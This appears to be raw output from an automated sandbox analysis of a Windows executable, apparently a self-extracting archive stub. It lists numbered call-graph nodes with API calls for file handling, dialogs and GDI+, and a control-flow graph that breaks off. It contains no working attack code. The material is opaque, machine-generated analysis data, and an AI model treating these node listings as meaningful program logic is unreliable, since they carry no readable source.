__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25797->25805 25806 367ba8 RaiseException std::_Xinvalid_argument 25797->25806 25798->25797 25807 373240 25798->25807 25800->25797 25803->25763 25804->25797 25805->25797 25806->25797 25810 37324e 84 API calls 25807->25810 25809 373249 25810->25809 25815 36d076 25811->25815 25814->25698 25816 36d09c GetVersionExW 25815->25816 25817 36d0c9 25815->25817 25816->25817 25818 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25817->25818 25819 368fe0 25818->25819 25819->25692 25822->25547 25824 36c4b2 25823->25824 25825 36c4e5 FindFirstFileW 25824->25825 25826 36c548 FindNextFileW 25824->25826 25828 36c4f2 25825->25828 25835 36c52d 25825->25835 25827 36c553 GetLastError 25826->25827 25826->25835 25827->25835 25829 36da1e 6 API calls 25828->25829 25830 36c505 25829->25830 25832 36c522 GetLastError 25830->25832 25833 36c509 FindFirstFileW 25830->25833 25831 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25834 36c39f 25831->25834 25832->25835 25833->25832 25833->25835 25834->25377 25834->25380 25835->25831 25836->25302 25838 3743a0 25837->25838 25839 3743b9 25838->25839 25842 3743cd 25838->25842 25844 372fc9 86 API calls 25839->25844 25841 3743c0 Concurrency::cancel_current_task 25841->25842 25844->25841 25853 37c574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25845->25853 25847 37c55d 25848 37c569 25847->25848 25854 37c595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25847->25854 25848->25093 25848->25094 25850->25104 25851->25104 25852->25107 25853->25847 25854->25848 25856 36b982 78 API calls 25855->25856 25857 3620f7 25856->25857 25858 361b63 116 API calls 25857->25858 25861 362114 25857->25861 25859 362104 25858->25859 25859->25861 25866 361407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25859->25866 25861->25123 25861->25124 25863 361b1e 25862->25863 25865 361b1a 25862->25865 25867 361a55 25863->25867 25865->25129 25866->25861 25868 361a67 25867->25868 25869 361aa4 25867->25869 25870 36441e 116 API calls 25868->25870 25875 3648bd 25869->25875 25872 361a87 25870->25872 25872->25865 25879 3648c6 25875->25879 25876 36441e 116 API calls 25876->25879 25877 361ac5 25877->25872 25880 361fb0 25877->25880 25878 372ee4 2 API calls 25878->25879 25879->25876 25879->25877 25879->25878 25881 361fbc __EH_prolog3 25880->25881 25892 3644ab 25881->25892 25884 3618b2 78 API calls 25885 361ff0 25884->25885 25924 36199b 78 API calls 25885->25924 25886 362060 25886->25872 25888 362008 25890 362014 _wcslen 25888->25890 25925 373d10 MultiByteToWideChar 25888->25925 25926 36199b 78 API calls 25890->25926 25893 3644c6 25892->25893 25894 3644f4 25893->25894 25895 364510 25893->25895 25927 361407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25894->25927 25896 36476a 25895->25896 25900 36453c 25895->25900 25933 361407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25896->25933 25899 3644ff 25901 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25899->25901 25900->25899 25903 3753f0 132 API calls 25900->25903 25902 361fdf 25901->25902 25902->25884 25902->25886 25909 364589 25903->25909 25904 3645bb 25906 364646 25904->25906 25923 3645b2 25904->25923 25930 36f014 97 API calls 25904->25930 25905 3645b7 25905->25904 25929 3625da 78 API calls 25905->25929 25907 36c94d 27 API calls 25906->25907 25910 364659 25907->25910 25908 3645a7 25928 361407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25908->25928 25909->25904 25909->25905 25909->25908 25915 3646f2 25910->25915 25916 3646e2 25910->25916 25912 374396 86 API calls 25912->25899 25918 375099 137 API calls 25915->25918 25917 36ab81 137 API calls 25916->25917 25919 3646f0 25917->25919 25918->25919 25931 36c905 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25919->25931 25921 36472a 25921->25923 25932 36240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25921->25932 25923->25912 25924->25888 25925->25890 25926->25886 25927->25899 25928->25923 25929->25904 25930->25906 25931->25921 25932->25923 25933->25899 25935 381590 25934->25935 25936 36bcea GetFileAttributesW 25935->25936 25937 36bd07 25936->25937 25938 36bd2c 25936->25938 25940 36da1e 6 API calls 25937->25940 25939 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25938->25939 25941 36bcd4 25939->25941 25942 36bd19 25940->25942 25941->24877 25941->24891 25942->25938 25943 36bd1d GetFileAttributesW 25942->25943 25943->25938 25945 37132e 25944->25945 25946 3712ff 25944->25946 25945->25143 25953 3728ab 25946->25953 25949 37130f GetProcAddress GetProcAddress 25949->25945 25950->25150 25951->25152 25952->25148 25954 381590 25953->25954 25955 3728b8 GetSystemDirectoryW 25954->25955 25956 3728de 25955->25956 25957 3728fa 25955->25957 25958 36dd18 5 API calls 25956->25958 25959 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25957->25959 25960 3728ed LoadLibraryW 25958->25960 25961 371309 25959->25961 25960->25957 25961->25945 25961->25949 26682 3782d0 137 API calls __InternalCxxFrameHandler 25982 37f6de 25996 37ea83 _wcslen _wcsrchr 25982->25996 25983 37d5dd 6 API calls 25983->25996 25984 37f717 25985 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25984->25985 25986 37f732 25985->25986 25987 37ed57 SetWindowTextW 25987->25996 25989 36dd18 5 API calls 25989->25996 25991 3866ae 22 API calls 25991->25996 25993 37eb4b SetFileAttributesW 25995 37ec05 GetFileAttributesW 25993->25995 26010 37eb65 _abort _wcslen 25993->26010 25995->25996 25998 37ec17 DeleteFileW 25995->25998 25996->25983 25996->25984 25996->25987 25996->25989 25996->25991 25996->25993 25999 37d41c 100 API calls 25996->25999 26002 37f73c 25996->26002 26007 37ef75 SendMessageW 25996->26007 26011 37c5dd GetCurrentDirectoryW 25996->26011 26013 36c3de 11 API calls 25996->26013 26014 36c367 FindClose 25996->26014 26015 37d76e 76 API calls 3 library calls 25996->26015 25998->25996 26000 37ec28 25998->26000 26001 37ef35 GetDlgItem SetWindowTextW SendMessageW 25999->26001 26004 364c00 _swprintf 51 API calls 26000->26004 26001->25996 26016 3813f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 26002->26016 26006 37ec48 GetFileAttributesW 26004->26006 26005 37f741 26006->26000 26008 37ec5d MoveFileW 26006->26008 26007->25996 26008->25996 26009 37ec75 MoveFileExW 26008->26009 26009->25996 26010->25995 26010->25996 26012 36d8ac 51 API calls 2 library calls 26010->26012 26011->25996 26012->26010 26013->25996 26014->25996 26015->25996 26016->26005 26620 37d8c0 98 API calls 26621 38e530 GetCommandLineA GetCommandLineW 26687 384f20 6 API calls 4 library calls 26689 38531b 38 API calls 4 library calls 24716 38030b 24717 380318 24716->24717 24726 370597 24717->24726 24724 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24725 380378 24724->24725 24727 3705a7 24726->24727 24738 3705c8 24727->24738 24730 364c00 24765 364bd3 24730->24765 24733 37d864 PeekMessageW 24734 37d87f GetMessageW 24733->24734 24735 37d8b8 24733->24735 24736 37d895 IsDialogMessageW 24734->24736 24737 37d8a4 TranslateMessage DispatchMessageW 24734->24737 24735->24724 24736->24735 24736->24737 24737->24735 24744 36f892 24738->24744 24741 3705c5 24741->24730 24742 3705eb LoadStringW 24742->24741 24743 370602 LoadStringW 24742->24743 24743->24741 24751 36f7b8 24744->24751 24747 36f8d3 24749 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24747->24749 24750 36f8e8 24749->24750 24750->24741 24750->24742 24752 36f7e1 24751->24752 24760 36f85d _strncpy 24751->24760 24755 36f801 24752->24755 24762 373f47 WideCharToMultiByte 24752->24762 24754 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24756 36f88b 24754->24756 24757 36f832 24755->24757 24763 370531 50 API calls __vsnprintf 24755->24763 24756->24747 24761 36f8ec 26 API calls 24756->24761 24764 388a01 26 API calls 3 library calls 24757->24764 24760->24754 24761->24747 24762->24755 24763->24757 24764->24760 24766 364bea __vswprintf_c_l 24765->24766 24769 388772 24766->24769 24772 386835 24769->24772 24773 38685d 24772->24773 24774 386875 24772->24774 24789 38bc7b 20 API calls _free 24773->24789 24774->24773 24776 38687d 24774->24776 24777 386dd4 __fassign 38 API calls 24776->24777 24779 38688d 24777->24779 24778 386862 24790 386649 26 API calls __cftof 24778->24790 24791 386d9f 20 API calls 2 library calls 24779->24791 24781 38686d 24783 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24781->24783 24785 364bf4 SetDlgItemTextW 24783->24785 24784 386905 24792 387184 51 API calls 4 library calls 24784->24792 24785->24733 24788 386910 24793 386e57 20 API calls _free 24788->24793 24789->24778 24790->24781 24791->24784 24792->24788 24793->24781 26630 380900 14 API calls ___delayLoadHelper2@8 26692 381b00 46 API calls __RTC_Initialize 26632 381d07 29 API calls _abort 26694 38dafe 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26695 366b70 41 API calls __EH_prolog3 26696 37ea83 131 API calls 5 library calls 26697 37d361 78 API calls 26636 37e560 91 API calls 2 library calls 26639 37f950 70 API calls 26640 38b150 7 API calls ___scrt_uninitialize_crt 26642 381d50 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 26643 38cd50 21 API calls 26699 38d750 FreeLibrary 26701 379740 132 API calls 26646 373d49 7 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26647 3811bf 48 API calls _unexpected 24632 36b9ba 24633 36b9cf 24632->24633 24634 36b9c8 24632->24634 24635 36b9dc GetStdHandle 24633->24635 24642 36b9eb 24633->24642 24635->24642 24636 36ba43 WriteFile 24636->24642 24637 36ba14 WriteFile 24638 36ba0f 24637->24638 24637->24642 24638->24637 24638->24642 24640 36bad5 24644 367e45 77 API calls 24640->24644 24642->24634 24642->24636 24642->24637 24642->24638 24642->24640 24643 367b1e 78 API calls 24642->24643 24643->24642 24644->24634 26651 37cda0 73 API calls 26708 36af90 80 API calls Concurrency::cancel_current_task 26709 37c390 GdipDisposeImage GdipFree 26652 394590 CloseHandle 26711 37d384 GetDlgItem EnableWindow ShowWindow SendMessageW 26653 382580 LocalFree 26712 37ea83 121 API calls 5 library calls 24799 380782 24800 380686 24799->24800 24801 380d3a ___delayLoadHelper2@8 14 API calls 24800->24801 24801->24800 26656 3829e0 51 API calls 2 library calls 25962 3711eb 25963 3711f3 FreeLibrary 25962->25963 25964 3711fb 25962->25964 25963->25964 26717 37c3d0 GdipCloneImage GdipAlloc 26718 37b3d0 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26017 381bd2 26018 381bde __FrameHandler3::FrameUnwindToState 26017->26018 26049 38176c 26018->26049 26020 381be5 26021 381d38 26020->26021 26024 381c0f 26020->26024 26128 381fca IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 26021->26128 26023 381d3f 26121 38a7aa 26023->26121 26036 381c4e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 26024->26036 26060 38b34d 26024->26060 26031 381c2e 26033 381caf 26068 3820e5 GetStartupInfoW _abort 26033->26068 26035 381cb5 26069 38b29e 51 API calls 26035->26069 26036->26033 26124 38a29c 38 API calls 3 library calls 26036->26124 26039 381cbd 26070 38037c 26039->26070 26043 381cd1 26043->26023 26044 381cd5 26043->26044 26045 381cde 26044->26045 26126 38a74d 28 API calls _abort 26044->26126 26127 3818dd 12 API calls ___scrt_uninitialize_crt 26045->26127 26048 381ce6 26048->26031 26050 381775 26049->26050 26130 381de6 IsProcessorFeaturePresent 26050->26130 26052 381781 26131 38507e 26052->26131 26054 38178a 26054->26020 26055 381786 26055->26054 26139 38b1d7 26055->26139 26058 3817a1 26058->26020 26061 38b364 26060->26061 26062 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26061->26062 26063 381c28 26062->26063 26063->26031 26064 38b2f1 26063->26064 26065 38b320 26064->26065 26066 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26065->26066 26067 38b349 26066->26067 26067->26036 26068->26035 26069->26039 26188 37290a 26070->26188 26074 3803aa 26244 37ccd9 26074->26244 26076 3803b3 _abort 26077 3803c6 GetCommandLineW 26076->26077 26078 3803d9 26077->26078 26079 38046a GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 26077->26079 26248 37e872 26078->26248 26081 364c00 _swprintf 51 API calls 26079->26081 26083 3804e6 SetEnvironmentVariableW GetModuleHandleW LoadIconW 26081->26083 26263 37d9dd LoadBitmapW 26083->26263 26084 380464 26255 37ffdd 26084->26255 26085 3803e7 OpenFileMappingW 26088 38045b CloseHandle 26085->26088 26089 3803ff MapViewOfFile 26085->26089 26088->26079 26092 380410 __InternalCxxFrameHandler 26089->26092 26093 380454 UnmapViewOfFile 26089->26093 26097 37ffdd 7 API calls 26092->26097 26093->26088 26098 38042c 26097->26098 26100 37136b 82 API calls 26098->26100 26099 37afe6 27 API calls 26101 380546 DialogBoxParamW 26099->26101 26102 380440 26100->26102 26105 380580 26101->26105 26103 371421 82 API calls 26102->26103 26104 38044b 26103->26104 26104->26093 26106 380599 26105->26106 26107 380592 Sleep 26105->26107 26109 3805a7 26106->26109 26293 37cf89 7 API calls 3 library calls 26106->26293 26107->26106 26110 3805c6 DeleteObject 26109->26110 26111 3805db DeleteObject 26110->26111 26112 3805e2 26110->26112 26111->26112 26113 380613 26112->26113 26114 380625 26112->26114 26294 38004d 6 API calls 26113->26294 26290 37cd3f 26114->26290 26117 380619 CloseHandle 26117->26114 26118 38065f 26119 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26118->26119 26120 380673 26119->26120 26125 38211b GetModuleHandleW 26120->26125 26426 38a527 26121->26426 26124->26033 26125->26043 26126->26045 26127->26048 26128->26023 26130->26052 26143 386127 26131->26143 26134 385087 26134->26055 26136 38508f 26137 38509a 26136->26137 26157 386163 DeleteCriticalSection 26136->26157 26137->26055 26184 38e6aa 26139->26184 26142 38509d 7 API calls 2 library calls 26142->26054 26145 386130 26143->26145 26146 386159 26145->26146 26147 385083 26145->26147 26158 38636c 26145->26158 26163 386163 DeleteCriticalSection 26146->26163 26147->26134 26149 3851ac 26147->26149 26177 38627d 26149->26177 26152 3851c1 26152->26136 26154 3851cf 26155 3851dc 26154->26155 26183 3851df 6 API calls ___vcrt_FlsFree 26154->26183 26155->26136 26157->26134 26164 386192 26158->26164 26161 3863a4 InitializeCriticalSectionAndSpinCount 26162 38638f 26161->26162 26162->26145 26163->26147 26165 3861af 26164->26165 26169 3861b3 26164->26169 26165->26161 26165->26162 26166 38621b GetProcAddress 26166->26165 26168 386229 26166->26168 26168->26165 26169->26165 26169->26166 26170 38620c 26169->26170 26172 386232 LoadLibraryExW 26169->26172 26170->26166 26171 386214 FreeLibrary 26170->26171 26171->26166 26173 386249 GetLastError 26172->26173 26174 386279 26172->26174 26173->26174 26175 386254 ___vcrt_FlsFree 26173->26175 26174->26169 26175->26174 26176 38626a LoadLibraryExW 26175->26176 26176->26169 26178 386192 ___vcrt_FlsFree 5 API calls 26177->26178 26179 386297 26178->26179 26180 3862b0 TlsAlloc 26179->26180 26181 3851b6 26179->26181 26181->26152 26182 38632e 6 API calls ___vcrt_FlsFree 26181->26182 26182->26154 26183->26152 26185 38e6c3 26184->26185 26186 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26185->26186 26187 381793 26186->26187 26187->26058 26187->26142 26189 381590 26188->26189 26190 372914 GetModuleHandleW 26189->26190 26191 372943 GetProcAddress 26190->26191 26192 372999 26190->26192 26194 372955 26191->26194 26195 37296d GetProcAddress 26191->26195 26193 372cda 26192->26193 26295 389e7e 42 API calls 2 library calls 26192->26295 26196 372cdc GetModuleFileNameW 26193->26196 26194->26195 26195->26192 26199 37297f 26195->26199 26208 372cfa 26196->26208 26198 372c06 26198->26196 26200 372c13 GetModuleFileNameW CreateFileW 26198->26200 26199->26192 26201 372c47 SetFilePointer 26200->26201 26202 372ccc CloseHandle 26200->26202 26201->26202 26203 372c55 ReadFile 26201->26203 26202->26196 26203->26202 26204 372c73 26203->26204 26206 372ede 26204->26206 26210 372c85 26204->26210 26205 36d076 6 API calls 26205->26208 26298 3813f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 26206->26298 26208->26205 26211 3728ab 7 API calls 26208->26211 26212 372d5c GetFileAttributesW 26208->26212 26213 372d74 26208->26213 26209 372ee3 26210->26202 26214 3728ab 7 API calls 26210->26214 26211->26208 26212->26208 26212->26213 26215 372db4 26213->26215 26216 372d7f 26213->26216 26214->26210 26217 372ec3 26215->26217 26218 372dbc 26215->26218 26221 372d98 GetFileAttributesW 26216->26221 26223 372db0 26216->26223 26219 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26217->26219 26222 36d076 6 API calls 26218->26222 26220 372ed5 26219->26220 26243 37c5dd GetCurrentDirectoryW 26220->26243 26221->26216 26221->26223 26224 372dce 26222->26224 26223->26215 26225 372dd5 26224->26225 26226 372e3b 26224->26226 26228 3728ab 7 API calls 26225->26228 26227 364c00 _swprintf 51 API calls 26226->26227 26229 372e63 AllocConsole 26227->26229 26230 372ddf 26228->26230 26231 372e70 GetCurrentProcessId AttachConsole 26229->26231 26232 372ebb ExitProcess 26229->26232 26233 3728ab 7 API calls 26230->26233 26296 386433 26231->26296 26235 372de9 26233->26235 26237 370597 53 API calls 26235->26237 26236 372e91 GetStdHandle WriteConsoleW Sleep FreeConsole 26236->26232 26238 372e04 26237->26238 26239 364c00 _swprintf 51 API calls 26238->26239 26240 372e17 26239->26240 26241 370597 53 API calls 26240->26241 26242 372e26 26241->26242 26242->26232 26243->26074 26245 3728ab 7 API calls 26244->26245 26246 37cced OleInitialize 26245->26246 26247 37cd10 GdiplusStartup SHGetMalloc 26246->26247 26247->26076 26253 37e87c 26248->26253 26249 37e9a0 26250 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26249->26250 26251 37e9b1 26250->26251 26251->26084 26251->26085 26252 374159 CharUpperW 26252->26253 26253->26249 26253->26252 26254 371421 82 API calls 26253->26254 26254->26253 26256 381590 26255->26256 26257 37ffea SetEnvironmentVariableW 26256->26257 26258 380016 26257->26258 26259 38003e 26258->26259 26262 380032 SetEnvironmentVariableW 26258->26262 26260 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26259->26260 26261 380049 26260->26261 26261->26079 26262->26259 26264 37d9fe 26263->26264 26265 37da0b GetObjectW 26263->26265 26299 37c652 FindResourceW 26264->26299 26267 37da1a 26265->26267 26269 37c556 4 API calls 26267->26269 26270 37da2d 26269->26270 26271 37da70 26270->26271 26272 37da4c 26270->26272 26273 37c652 12 API calls 26270->26273 26282 36f93e 26271->26282 26313 37c595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26272->26313 26275 37da3d 26273->26275 26275->26272 26277 37da43 DeleteObject 26275->26277 26276 37da54 26314 37c574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26276->26314 26277->26272 26279 37da5d 26315 37c79c 13 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26279->26315 26281 37da64 DeleteObject 26281->26271 26324 36f963 26282->26324 26287 37afe6 26288 38121c 27 API calls 26287->26288 26289 37b005 26288->26289 26289->26099 26291 37cd78 GdiplusShutdown OleUninitialize 26290->26291 26291->26118 26293->26109 26294->26117 26295->26198 26297 38643b 26296->26297 26297->26236 26297->26297 26298->26209 26300 37c675 SizeofResource 26299->26300 26301 37c763 26299->26301 26300->26301 26302 37c68c LoadResource 26300->26302 26301->26265 26301->26267 26302->26301 26303 37c6a1 LockResource 26302->26303 26303->26301 26304 37c6b2 GlobalAlloc 26303->26304 26304->26301 26305 37c6cd GlobalLock 26304->26305 26306 37c75c GlobalFree 26305->26306 26307 37c6dc __InternalCxxFrameHandler 26305->26307 26306->26301 26308 37c755 GlobalUnlock 26307->26308 26316 37c5b6 GdipAlloc 26307->26316 26308->26306 26311 37c740 26311->26308 26312 37c72a GdipCreateHBITMAPFromBitmap 26312->26311 26313->26276 26314->26279 26315->26281 26317 37c5d5 26316->26317 26318 37c5c8 26316->26318 26317->26308 26317->26311 26317->26312 26320 37c34d 26318->26320 26321 37c375 GdipCreateBitmapFromStream 26320->26321 26322 37c36e GdipCreateBitmapFromStreamICM 26320->26322 26323 37c37a 26321->26323 26322->26323 26323->26317 26325 36f975 26324->26325 26326 36f9cb GetModuleFileNameW 26325->26326 26327 36f9f8 26325->26327 26328 36f9df 26326->26328 26378 36b2b0 26327->26378 26328->26327 26330 36fa1b 26336 3701bd 78 API calls 26330->26336 26339 36fa47 26330->26339 26363 36fc4f 26330->26363 26331 36af2f 80 API calls 26332 370192 26331->26332 26334 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26332->26334 26337 36f94a 26334->26337 26335 36fa5a 26338 388bc0 26 API calls 26335->26338 26336->26330 26376 3701fa GetModuleHandleW FindResourceW 26337->26376 26347 36fa6c ___vcrt_FlsFree 26338->26347 26391 388bc0 26339->26391 26340 36fb92 26340->26363 26411 36b7b0 81 API calls 26340->26411 26342 36b8c0 79 API calls 26342->26347 26344 36fba9 ___std_exception_copy 26345 36b610 82 API calls 26344->26345 26344->26363 26348 36fbcf ___std_exception_copy 26345->26348 26347->26340 26347->26342 26347->26363 26405 36b610 26347->26405 26410 36b7b0 81 API calls 26347->26410 26348->26363 26374 36fbda _wcslen ___std_exception_copy ___vcrt_FlsFree 26348->26374 26412 373d10 MultiByteToWideChar 26348->26412 26351 36ffed 26369 36fd76 26351->26369 26415 38b52e 26 API calls 2 library calls 26351->26415 26353 3700b6 26419 389ea8 26 API calls 2 library calls 26353->26419 26355 37010e 26420 3701d8 78 API calls 26355->26420 26356 370126 26357 37015c 26356->26357 26360 3701bd 78 API calls 26356->26360 26358 388bc0 26 API calls 26357->26358 26361 370175 26358->26361 26360->26356 26362 388bc0 26 API calls 26361->26362 26362->26363 26363->26331 26364 37000c 26416 389ea8 26 API calls 2 library calls 26364->26416 26366 370064 26417 3701d8 78 API calls 26366->26417 26367 373f47 WideCharToMultiByte 26367->26374 26369->26356 26418 38b52e 26 API calls 2 library calls 26369->26418 26370 3701b7 26421 3813f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 26370->26421 26372 3701bc 26374->26351 26374->26363 26374->26367 26374->26369 26374->26370 26413 370531 50 API calls __vsnprintf 26374->26413 26414 388a01 26 API calls 3 library calls 26374->26414 26377 36f951 26376->26377 26377->26287 26380 36b2ba 26378->26380 26379 36b334 CreateFileW 26381 36b34f GetLastError 26379->26381 26382 36b39b 26379->26382 26380->26379 26383 36da1e 6 API calls 26381->26383 26386 36b3df 26382->26386 26388 36b3c5 SetFileTime 26382->26388 26384 36b36c 26383->26384 26384->26382 26385 36b370 CreateFileW GetLastError 26384->26385 26385->26382 26387 36b395 26385->26387 26389 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26386->26389 26387->26382 26388->26386 26390 36b41e 26389->26390 26390->26330 26392 388bf9 26391->26392 26393 388bfd 26392->26393 26404 388c25 26392->26404 26422 38bc7b 20 API calls _free 26393->26422 26395 388f49 26397 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26395->26397 26396 388c02 26423 386649 26 API calls __cftof 26396->26423 26399 388f56 26397->26399 26399->26335 26400 388c0d 26401 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26400->26401 26403 388c19 26401->26403 26403->26335 26404->26395 26424 388ae0 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26404->26424 26406 36b61c 26405->26406 26409 36b623 26405->26409 26406->26347 26408 36b151 GetStdHandle ReadFile GetLastError GetLastError GetFileType 26408->26409 26409->26406 26409->26408 26425 367c95 77 API calls 26409->26425 26410->26347 26411->26344 26412->26374 26413->26374 26414->26374 26415->26364 26416->26366 26417->26369 26418->26353 26419->26355 26420->26356 26421->26372 26422->26396 26423->26400 26424->26404 26425->26409 26427 38a533 _unexpected 26426->26427 26428 38a53a 26427->26428 26429 38a54c 26427->26429 26465 38a681 GetModuleHandleW 26428->26465 26450 38d281 EnterCriticalSection 26429->26450 26432 38a53f 26432->26429 26466 38a6c5 GetModuleHandleExW 26432->26466 26437 38a553 26445 38a5c8 26437->26445 26448 38a5f1 26437->26448 26451 38b040 26437->26451 26438 38a63a 26474 3949b0 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26438->26474 26439 38a60e 26457 38a640 26439->26457 26442 38b2f1 _abort 5 API calls 26447 38a5e0 26442->26447 26443 38b2f1 _abort 5 API calls 26443->26448 26445->26442 26445->26447 26447->26443 26454 38a631 26448->26454 26450->26437 26475 38ad79 26451->26475 26494 38d2d1 LeaveCriticalSection 26454->26494 26456 38a60a 26456->26438 26456->26439 26495 38d6c6 26457->26495 26460 38a66e 26463 38a6c5 _abort 8 API calls 26460->26463 26461 38a64e GetPEB 26461->26460 26462 38a65e GetCurrentProcess TerminateProcess 26461->26462 26462->26460 26464 38a676 ExitProcess 26463->26464 26465->26432 26467 38a6ef GetProcAddress 26466->26467 26468 38a712 26466->26468 26471 38a704 26467->26471 26469 38a718 FreeLibrary 26468->26469 26470 38a721 26468->26470 26469->26470 26472 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26470->26472 26471->26468 26473 38a54b 26472->26473 26473->26429 26478 38ad28 26475->26478 26477 38ad9d 26477->26445 26479 38ad34 __FrameHandler3::FrameUnwindToState 26478->26479 26486 38d281 EnterCriticalSection 26479->26486 26481 38ad42 26487 38adc9 26481->26487 26485 38ad60 _abort 26485->26477 26486->26481 26488 38ade9 26487->26488 26492 38adf1 26487->26492 26489 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26488->26489 26490 38ad4f 26489->26490 26493 38ad6d LeaveCriticalSection _abort 26490->26493 26491 38bafa _free 20 API calls 26491->26488 26492->26488 26492->26491 26493->26485 26494->26456 26496 38d6eb 26495->26496 26497 38d6e1 26495->26497 26498 38d2e8 _free 5 API calls 26496->26498 26499 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26497->26499 26498->26497 26500 38a64a 26499->26500 26500->26460 26500->26461 26720 38a7c0 52 API calls 2 library calls 26721 381bc0 27 API calls 26659 3955c0 VariantClear

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 359 37ea07-37ea55 call 381590 362 37f717-37f739 call 3810f9 359->362 363 37ea5b-37ea81 call 37d5dd 359->363 368 37ea83 363->368 368->362 369 37ea89-37ea9d 368->369 370 37ea9e-37eab3 call 37d148 369->370 373 37eab5 370->373 374 37eab7-37eacc call 374168 373->374 377 37eace-37ead2 374->377 378 37ead9-37eadc 374->378 377->374 381 37ead4 377->381 379 37eae2 378->379 380 37f6ea-37f712 call 37d5dd 378->380 382 37ed4f-37ed51 379->382 383 37ecae-37ecb0 379->383 384 37ed6d-37ed6f 379->384 385 37eae9-37eaec 379->385 380->368 381->380 382->380 390 37ed57-37ed68 SetWindowTextW 382->390 383->380 388 37ecb6-37ecc2 383->388 384->380 387 37ed75-37ed7c 384->387 385->380 389 37eaf2-37eb46 call 37c5dd call 36dd18 call 36c351 call 36c48b call 367eed 385->389 387->380 392 37ed82-37ed9b 387->392 393 37ecd6-37ecdb 388->393 394 37ecc4-37ecd5 call 389f09 388->394 449 37ec85-37ec97 call 36c3de 389->449 390->380 396 37eda3-37edb1 call 386433 392->396 397 37ed9d 392->397 400 37ece5-37ecf0 call 37d76e 393->400 401 37ecdd-37ece3 393->401 394->393 396->380 413 37edb7-37edc0 396->413 397->396 405 37ecf5-37ecf7 400->405 401->405 410 37ed02-37ed22 call 386433 call 3866ae 405->410 411 37ecf9-37ed00 call 386433 405->411 432 37ed24-37ed2b 410->432 433 37ed3b-37ed3d 410->433 411->410 417 37edc2-37edc6 413->417 418 37ede9-37edec 413->418 422 37edf2-37edf5 417->422 423 37edc8-37edd0 417->423 418->422 425 37eee4-37eef2 call 37268b 418->425 430 37edf7-37edfc 422->430 431 37ee02-37ee1d 422->431 423->380 427 37edd6-37ede4 call 37268b 423->427 442 37eef4-37ef08 call 384b4e 425->442 427->442 430->425 430->431 444 37ee1f-37ee5a 431->444 445 37ee7a-37ee81 431->445 438 37ed32-37ed3a call 389f09 432->438 439 37ed2d-37ed2f 432->439 433->380 440 37ed43-37ed4a call 3866a9 433->440 438->433 439->438 440->380 456 37ef15-37ef66 call 37268b call 37d41c GetDlgItem SetWindowTextW SendMessageW call 388796 442->456 457 37ef0a-37ef0e 442->457 481 